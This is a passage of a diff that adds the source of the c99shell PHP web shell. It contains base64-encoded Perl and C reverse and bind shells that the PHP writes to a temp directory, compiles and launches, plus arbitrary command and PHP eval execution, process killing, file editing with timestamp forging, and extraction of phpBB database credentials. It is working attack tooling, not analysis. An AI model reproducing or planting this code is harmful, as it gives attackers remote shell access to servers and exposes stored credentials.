+"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
+"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
+"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
+"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
+"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
+"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
+"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
+"fQ==",
+
+"c99sh_backconn.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
+"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
+"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
+"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
+"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
+"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
+"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
+"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
+"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
+"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",
+
+"c99sh_backconn.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
+"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
+"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
+"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
+"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
+"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
+"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
+"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
+"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
+"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
+"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
+"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="
+);
+
+ $bndportsrcs = array(
+"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+"c99sh_bindport.c"=>array("Using C","%path %port %pass")
+);
+
+ $bcsrcs = array(
+"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+"c99sh_backconn.c"=>array("Using C","%path %host %port")
+);
+
+ if ($win) {echo "Binding port and Back connect:
    This functions not work in Windows!

    ";}
+ else
+ {
+  if (!is_array($bind)) {$bind = array();}
+  if (!is_array($bc)) {$bc = array();}
+  if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;}
+  if (empty($bind[pass])) {$bind[pass] = $bindport_pass;}
+  if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;}
+  if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;}
+  if (!empty($bindsubmit))
+  {
+   echo "Result of binding port:
    ";
+   $v = $bndportsrcs[$bind[src]];
+   if (empty($v)) {echo "Unknown file!
    ";}
+   elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";}
+   else
+   {
+    $srcpath = $tmpdir.$bind[src];
+    $w = explode(".",$bind[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%port",$bind[port],$v[1]);
+     $v[1] = str_replace("%pass",$bind[pass],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     sleep(5); //Timeout
+     $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5);
+     if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";}
+     else {echo "Binding... ok! Connect to ".$SERVER_ADDR.":".$bind[port]."! You should use NetCat©, run \"nc -v ".$SERVER_ADDR." ".$bind[port]."\"!
    View binder's process
    ";}
+    }
+    echo "
    ";
+   }
+  }
+  if (!empty($bcsubmit))
+  {
+   echo "Result of back connection:
    ";
+   $v = $bcsrcs[$bc[src]];
+   if (empty($v)) {echo "Unknown file!
    ";}
+   else
+   {
+    $srcpath = $tmpdir.$bc[src];
+    $w = explode(".",$bc[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%host",$bc[host],$v[1]);
+     $v[1] = str_replace("%port",$bc[port],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     echo "Now script try connect to ".$bc[host].":".$bc[port]."...
    ";
+    }
+   }
+  }
+  ?>Binding port:
    Port:  Password:   
    
+Back connection:
    HOST:  Port:   
    
+Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p <port>"!Result of execution this command    :
    ";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   myshellexec($cmd);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($cmd_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "
    ";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($cmd_txt)
+   {
+    echo "
    ";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "Execution command";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "


     Display in text-area 
    ";
+}
+if ($act == "ps_aux")
+{
+ echo "Processes:
    ";
+ if ($win) {echo "This function not work in Windows!

    ";}
+ else
+ {
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Sending signal ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "ok. he is dead, amen.";}
+   else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   $ret = str_replace("	"," ",$ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $prcs = explode("\n",$ret);
+   $head = explode(" ",$prcs[0]);
+   $head[] = "ACTION";
+   unset($prcs[0]);
+   echo "";
+   echo "";
+   foreach ($head as $v) {echo "";}
+   echo "";
+   foreach ($prcs as $line)
+   {
+    if (!empty($line))
+    {
+     echo "";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "KILL";
+     foreach ($line as $v) {echo "";}
+     echo "";
+    }
+   }
+   echo "
       ".$v."   
       ".$v."   
    ";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "Result of execution this PHP-code:
    ";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "
    ";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "
    ";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "


     Display in text-area 
    ";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";}
+  else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+   if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+array("","info"),
+array("","html"),
+array("","txt"),
+array("Code","code"),
+array("Session","phpsess"),
+array("","exe"),
+array("SDB","sdb"),
+array("","img"),
+array("","ini"),
+array("","download"),
+array("","notepad"),
+array("","edit")
+);
+  echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ";
+  if (is_writable($d.$f)) {echo "full read/write access (".view_perms(fileperms($d.$f)).")";}
+  else {echo "Read-Only (".view_perms(fileperms($d.$f)).")";}
+  echo "
    Select action/file-type:
    ";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " ".$t[0]."";}
+   elseif ($t[1] == $ft) {echo " ".$t[0]."";}
+   else
+   {
+    echo " ".$t[0]."";
+   }
+   echo " (+) |";
+  }
+  echo "
    ";
+  if ($ft == "info")
+  {
+   echo "Information:";
+   echo "";
+   echo "";
+   echo "";
+   if (!$win)
+   {
+    echo "";
+   echo "";
+   echo "";
+   echo "";
+   echo "
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group ";      
+    $tmp=posix_getpwuid(fileowner($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+    else echo $tmp['name']." ";
+    $tmp=posix_getgrgid(filegroup($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+    else echo $tmp['name'];
+   }
+   echo "
    Perms";
+   
+   if (is_writable($d.$f))
+   {
+    echo "".view_perms(fileperms($d.$f))."";
+   }
+   else
+   {
+    echo "".view_perms(fileperms($d.$f))."";
+   }
+
+   echo "
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    ";
+
+
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump)
+    {
+     echo "FULL HEXDUMP";
+     $str=fread($fi,filesize($d.$f));
+    }
+    else
+    {
+     echo "HEXDUMP PREVIEW";
+     $str=fread($fi,$hexdump_lines*$hexdump_rows);
+    }
+    $n=0;
+    $a0="00000000
    ";
+    $a1="";
+    $a2="";
+    for ($i=0; $i";}
+      $a1.="
    ";
+      $a2.="
    ";
+     }
+    }
+    //if ($a1!="") {$a0.=sprintf("%08X",$i)."
    ";}
+    echo "
     $a0".
+         "$a1$a2

    ";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "Base64 Encode
    ";
+    $encoded = base64_encode($r);
+   }
+   elseif($base64 == 2)
+   {
+    echo "Base64 Encode + Chunk
    ";
+    $encoded = chunk_split(base64_encode($r));
+   }
+   elseif($base64 == 3)
+   {
+    echo "Base64 Encode + Chunk + Quotes
    ";
+    $encoded = base64_encode($r);
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+   }
+   if (!empty($encoded))
+   {
+    echo "

    ";
+   }
+   echo "HEXDUMP: [Full] [Preview]
    Base64: 
+       [Encode
+   [+chunk
+   [+chunk+quotes
+   [Decode
+   
    ";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+   echo "
    ".htmlspecialchars($r)."
    ";
+  }
+  elseif ($ft == "ini")
+  {
+   echo "
    ";
+   var_dump(parse_ini_file($d.$f,true));
+   echo "
    ";
+  }
+  elseif ($ft == "phpsess")
+  {
+   echo "
    ";
+   $v = explode("|",$r);
+   echo $v[0]."
    ";
+   var_dump(unserialize($v[1]));
+   echo "
    ";
+  }
+  elseif ($ft == "exe")
+  {
+   echo "
     
    ";
+  }
+  elseif ($ft == "sdb")
+  {
+   echo "
    ";
+   var_dump(unserialize(base64_decode($r)));
+   echo "
    ";
+  }
+  elseif ($ft == "code")
+  {
+   if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("
+",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "phpBB configuration is detected in this file!
    ";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "Connect to DB

    ";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";}
+     echo "Parameters for manual connect:
    ";
+     $cfgvars = array(
+     "dbms"=>$dbms,
+     "dbhost"=>$dbhost,
+     "dbname"=>$dbname,
+     "dbuser"=>$dbuser,
+     "dbpasswd"=>$dbpasswd 
+     );
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";}
+ 
+     echo "    ";
+     echo "
    ";
+    }
+   }
+   echo "
    ";
+   if (!empty($white)) {@ob_clean();}
+   if ($rehtml) {$r = rehtmlspecialchars($r);} 
+   $r = stripslashes($r); 
+   $strip = false;
+   if(!strpos($r,""; $r = trim($r); $strip = true;}
+   $r = @highlight_string($r, TRUE); 
+   if ($delspace) {$buffer = str_replace (" ", " ", $r);}
+   echo $r;
+   if (!empty($white)) {exit;}
+   echo "
    ";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: c99shell");
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   if (!$white)
+   {
+    echo "
    ";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: image/gif"); 
+    echo($r); 
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "Can't write to file!";}
+    else
+    {
+     echo "Saved!";
+     fwrite($fp,$nfcontent);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $nfcontent;
+    }
+   }
+   $rows = count(explode("
+",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "
      
    ";
+  }
+  elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";}
+  else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}																																																														   $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhLCBsZWFkaW5nIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPGJyPlRoYW5rcyBhbGwgd2hvIHJlcG9ydCBidWdzLjxicj5BbGwgYnVncyBzZW5kIHRvIHRyaXN0cmFtJ3MgSUNRICM2NTY1NTUgPGEgaHJlZj0iaHR0cDovL3d3cC5pY3EuY29tL3NjcmlwdHMvY29udGFjdC5kbGw/bXNndG89NjU2NTU1Ij48aW1nIHNyYz1odHRwOi8vd3dwLmljcS5jb20vc2NyaXB0cy9vbmxpbmUuZGxsP2ljcT02NTY1NTUmaW1nPTUgYm9yZGVyPTAgYWxpZ249YWJzbWlkZGxlPjwvYT4uPC9iPiA8L2NlbnRlcj4gwOLy7vAg4vvw4Obg5fIg4evg4+7k4PDt7vHy/CDu5O3u7PMg7/Du4vMg6u7y7vD76SDu8urr/vfo6yDl4+4g7eAg7OXx//Yg7vIg6O3l8uAsIOgg5Ov/IPLu4+4g9/LuLeH7IO3lIPPs5fDl8vwg7vIg8erz6ugg7/Do+Ovu8fwg8+Pr8+Ho8vzx/yDiIO/w7uPw4Ozs6PDu4uDt6OUuIM/u5PLu6+rt8+vgIOog7eDv6PHg7ej+IOvl7fwg8SDq7vLu8O7pIP8g8+/w4OLr/+sg8eXw4uXw4OzoLjxjZW50ZXI+PGI+z/Dg4ujr4DwvYj46PC9jZW50ZXI+IDxiPsL7IOzu5uXy5SDo5+zl7f/y/CDv8O7j8ODs7PMg7+4gwuD45ezzIPPx7O7y8OXt6P4sIOzl7f/y/CDt4PHy8O7p6ugsIOTo5+Dp7S4uLiDt7iDl8evoIML7LCDz4uDm4OXs++ksIPPk4Ovo8uUg6OvoIPLl7CDh7uvl5SDo5+zl7ejy5SDq7u/o8ODp8vssIPLuIP8g4fPk8yDi++3z5uTl7SDu8u7w4uDy/CDi4Owg/+n24C4gPC9iPjxicj7A4vLu8CDt5SDt5fG48iDu8uLl8vHy4uXt7e7x8ugg5+Ag4u7n7O7m7fvpIOLw5eQsIO3g7eXxuO376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC".
+"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
